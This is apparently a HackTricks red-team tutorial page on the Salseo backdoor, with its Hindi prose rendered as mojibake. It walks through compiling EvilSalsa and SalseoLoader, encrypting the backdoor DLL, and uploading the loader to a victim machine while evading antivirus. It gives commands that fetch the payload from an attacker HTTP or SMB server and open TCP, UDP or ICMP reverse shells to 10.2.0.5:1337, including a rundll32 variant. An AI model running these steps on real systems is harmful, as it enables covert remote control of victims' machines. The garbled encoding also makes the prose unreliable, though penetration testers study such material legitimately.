# Salseo
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ЁЯТм [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## рдмрд╛рдЗрдирд░реА рд╕рдВрдХрд▓рди рдХрд░рдирд╛
рдЧрд┐рдЯрд╣рдм рд╕реЗ рд╕реНрд░реЛрдд рдХреЛрдб рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ рдФрд░ **EvilSalsa** рдФрд░ **SalseoLoader** рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВред рдЖрдкрдХреЛ рдХреЛрдб рд╕рдВрдХрд▓рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП **Visual Studio** рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреАред
рдЙрди рдкрд░рд┐рдпреЛрдЬрдирд╛рдУрдВ рдХреЛ рдЙрд╕ рд╡рд┐рдВрдбреЛрдЬ рдмреЙрдХреНрд╕ рдХреА рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЗ рд▓рд┐рдП рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВ рдЬрд╣рд╛рдБ рдЖрдк рдЙрдирдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ (рдпрджрд┐ рд╡рд┐рдВрдбреЛрдЬ x64 рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИ рддреЛ рдЙрдиреНрд╣реЗрдВ рдЙрд╕ рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЗ рд▓рд┐рдП рд╕рдВрдХрд▓рд┐рдд рдХрд░реЗрдВ)ред
рдЖрдк **Visual Studio** рдореЗрдВ **рдмрд╛рдПрдБ "Build" рдЯреИрдм** рдореЗрдВ **"Platform Target"** рдХреЗ рдЕрдВрджрд░ **рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХрд╛ рдЪрдпрди** рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
(\*\*рдпрджрд┐ рдЖрдк рдпреЗ рд╡рд┐рдХрд▓реНрдк рдирд╣реАрдВ рдкрд╛ рд░рд╣реЗ рд╣реИрдВ рддреЛ **"Project Tab"** рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдФрд░ рдлрд┐рд░ **"\ Properties"** рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ)
.png>)
рдлрд┐рд░, рджреЛрдиреЛрдВ рдкрд░рд┐рдпреЛрдЬрдирд╛рдУрдВ рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░реЗрдВ (Build -> Build Solution) (рд▓реЙрдЧ рдХреЗ рдЕрдВрджрд░ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдХрд╛ рдкрде рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛):
.png>)
## рдмреИрдХрдбреЛрд░ рддреИрдпрд╛рд░ рдХрд░реЗрдВ
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдЖрдкрдХреЛ **EvilSalsa.dll** рдХреЛ рдПрдиреНрдХреЛрдб рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреАред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдк рдкрд╛рдпрдерди рд╕реНрдХреНрд░рд┐рдкреНрдЯ **encrypterassembly.py** рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдпрд╛ рдЖрдк рдкрд░рд┐рдпреЛрдЬрдирд╛ **EncrypterAssembly** рдХреЛ рд╕рдВрдХрд▓рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
### **Python**
```
python EncrypterAssembly/encrypterassembly.py
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### рд╡рд┐рдВрдбреЛрдЬ
```
EncrypterAssembly.exe
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
рдареАрдХ рд╣реИ, рдЕрдм рдЖрдкрдХреЗ рдкрд╛рд╕ Salseo рдЪреАрдЬрд╝реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╕рднреА рдЪреАрдЬрд╝реЗрдВ рд╣реИрдВ: **encoded EvilDalsa.dll** рдФрд░ **SalseoLoader рдХрд╛ рдмрд╛рдЗрдирд░реАред**
**SalseoLoader.exe рдмрд╛рдЗрдирд░реА рдХреЛ рдорд╢реАрди рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВред рдЙрдиреНрд╣реЗрдВ рдХрд┐рд╕реА рднреА AV рджреНрд╡рд╛рд░рд╛ рдирд╣реАрдВ рдкрд╣рдЪрд╛рдирд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП...**
## **рдмреИрдХрдбреЛрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ**
### **TCP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (HTTP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛)**
рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд▓рд┐рд╕реНрдирд░ рдХреЗ рд░реВрдк рдореЗрдВ nc рд╢реБрд░реВ рдХрд░реЗрдВ рдФрд░ рдПрдиреНрдХреЛрдбреЗрдб evilsalsa рдХреЛ рд╕рд░реНрд╡ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ HTTP рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВред
```
SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp
```
### **UDP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (SMB рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛)**
рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд▓рд┐рд╕реНрдирд░ рдХреЗ рд░реВрдк рдореЗрдВ рдПрдХ nc рд╢реБрд░реВ рдХрд░реЗрдВ, рдФрд░ рдПрдиреНрдХреЛрдбреЗрдб evilsalsa (impacket-smbserver) рдХреЛ рд╕реЗрд╡рд╛ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ SMB рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВред
```
SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp
```
### **ICMP рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ (рд╡рд┐рдХреНрдЯрд┐рдо рдХреЗ рдЕрдВрджрд░ рдкрд╣рд▓реЗ рд╕реЗ рдПрдиреНрдХреЛрдбреЗрдб dll)**
**рдЗрд╕ рдмрд╛рд░ рдЖрдкрдХреЛ рдХреНрд▓рд╛рдЗрдВрдЯ рдореЗрдВ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡рд┐рд╢реЗрд╖ рдЙрдкрдХрд░рдг рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **ICMP рдЙрддреНрддрд░ рдмрдВрдж рдХрд░реЗрдВ:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ:
```
python icmpsh_m.py "" ""
```
#### рдкреАрдбрд╝рд┐рдд рдХреЗ рдЕрдВрджрд░, рдЪрд▓реЛ salseo рдЪреАрдЬрд╝ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВ:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp
```
## SalseoLoader рдХреЛ DLL рдХреЗ рд░реВрдк рдореЗрдВ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдирд╛ рдореБрдЦреНрдп рдлрд╝рдВрдХреНрд╢рди рдирд┐рд░реНрдпрд╛рдд рдХрд░ рд░рд╣рд╛ рд╣реИ
Visual Studio рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ SalseoLoader рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЦреЛрд▓реЗрдВред
### рдореБрдЦреНрдп рдлрд╝рдВрдХреНрд╢рди рд╕реЗ рдкрд╣рд▓реЗ рдЬреЛрдбрд╝реЗрдВ: \[DllExport]
.png>)
### рдЗрд╕ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЗ рд▓рд┐рдП DllExport рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
.png>)
#### **DllExport рдкреИрдХреЗрдЬ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ (Browse рдЯреИрдм рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП), рдФрд░ Install рджрдмрд╛рдПрдВ (рдФрд░ рдкреЙрдкрдЕрдк рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ)**
.png>)
рдЖрдкрдХреЗ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдлрд╝рд╛рдЗрд▓реЗрдВ рдкреНрд░рдХрдЯ рд╣реБрдИ рд╣реИрдВ: **DllExport.bat** рдФрд░ **DllExport\_Configure.bat**
### **U**ninstall DllExport
**Uninstall** рджрдмрд╛рдПрдВ (рд╣рд╛рдБ, рдпрд╣ рдЕрдЬреАрдм рд╣реИ рд▓реЗрдХрд┐рди рдореБрдЭ рдкрд░ рд╡рд┐рд╢реНрд╡рд╛рд╕ рдХрд░реЗрдВ, рдпрд╣ рдЖрд╡рд╢реНрдпрдХ рд╣реИ)
.png>)
### **Visual Studio рд╕реЗ рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ рдФрд░ DllExport\_configure рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ**
рдмрд╕ **рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ** Visual Studio
рдлрд┐рд░, рдЕрдкрдиреЗ **SalseoLoader рдлрд╝реЛрд▓реНрдбрд░** рдкрд░ рдЬрд╛рдПрдВ рдФрд░ **DllExport\_Configure.bat** рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
**x64** рдЪреБрдиреЗрдВ (рдпрджрд┐ рдЖрдк рдЗрд╕реЗ x64 рдмреЙрдХреНрд╕ рдХреЗ рдЕрдВрджрд░ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдЬрд╛ рд░рд╣реЗ рд╣реИрдВ, рддреЛ рдпрд╣ рдореЗрд░рд╛ рдорд╛рдорд▓рд╛ рдерд╛), **System.Runtime.InteropServices** рдЪреБрдиреЗрдВ ( **DllExport** рдХреЗ рд▓рд┐рдП **Namespace** рдХреЗ рдЕрдВрджрд░) рдФрд░ **Apply** рджрдмрд╛рдПрдВ
.png>)
### **Visual Studio рдХреЗ рд╕рд╛рде рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдлрд┐рд░ рд╕реЗ рдЦреЛрд▓реЗрдВ**
**\[DllExport]** рдЕрдм рддреНрд░реБрдЯрд┐ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд┐рд╣реНрдирд┐рдд рдирд╣реАрдВ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП
.png>)
### рд╕рдорд╛рдзрд╛рди рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░реЗрдВ
**Output Type = Class Library** рдЪреБрдиреЗрдВ (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
.png>)
**x64** **рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо** рдЪреБрдиреЗрдВ (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
.png>)
**рд╕рдорд╛рдзрд╛рди** рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП: Build --> Build Solution (Output рдХрдВрд╕реЛрд▓ рдХреЗ рдЕрдВрджрд░ рдирдП DLL рдХрд╛ рдкрде рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛)
### рдЙрддреНрдкрдиреНрди Dll рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░реЗрдВ
Dll рдХреЛ рдЙрд╕ рд╕реНрдерд╛рди рдкрд░ рдХреЙрдкреА рдФрд░ рдкреЗрд╕реНрдЯ рдХрд░реЗрдВ рдЬрд╣рд╛рдБ рдЖрдк рдЗрд╕рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред
рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ:
```
rundll32.exe SalseoLoader.dll,main
```
рдпрджрд┐ рдХреЛрдИ рддреНрд░реБрдЯрд┐ рдирд╣реАрдВ рдЖрддреА рд╣реИ, рддреЛ рд╢рд╛рдпрдж рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рдХрд╛рд░реНрдпрд╛рддреНрдордХ DLL рд╣реИ!!
## DLL рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
**HTTP** **рд╕рд░реНрд╡рд░** рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рди рднреВрд▓реЗрдВ рдФрд░ рдПрдХ **nc** **рд╢реНрд░реЛрддрд╛** рд╕реЗрдЯ рдХрд░реЗрдВ
### рдкреЙрд╡рд░рд╢реЗрд▓
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
{% hint style="success" %}
AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
* [**рд╕рджрд╕реНрдпрддрд╛ рдпреЛрдЬрдирд╛рдПрдБ**](https://github.com/sponsors/carlospolop) рджреЗрдЦреЗрдВ!
* **рд╣рдорд╛рд░реЗ** ЁЯТм [**Discord рд╕рдореВрд╣**](https://discord.gg/hRep4RUj7f) рдпрд╛ [**telegram рд╕рдореВрд╣**](https://t.me/peass) рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВ рдпрд╛ **рд╣рдорд╛рд░реЗ** **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВред**
* **рд╣реИрдХрд┐рдВрдЧ рдЯреНрд░рд┐рдХреНрд╕ рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдФрд░** [**HackTricks**](https://github.com/carlospolop/hacktricks) рдФрд░ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github рд░рд┐рдкреЛрдЬрд┐рдЯрд░реА рдореЗрдВ PRs рд╕рдмрдорд┐рдЯ рдХрд░реЗрдВред
{% endhint %}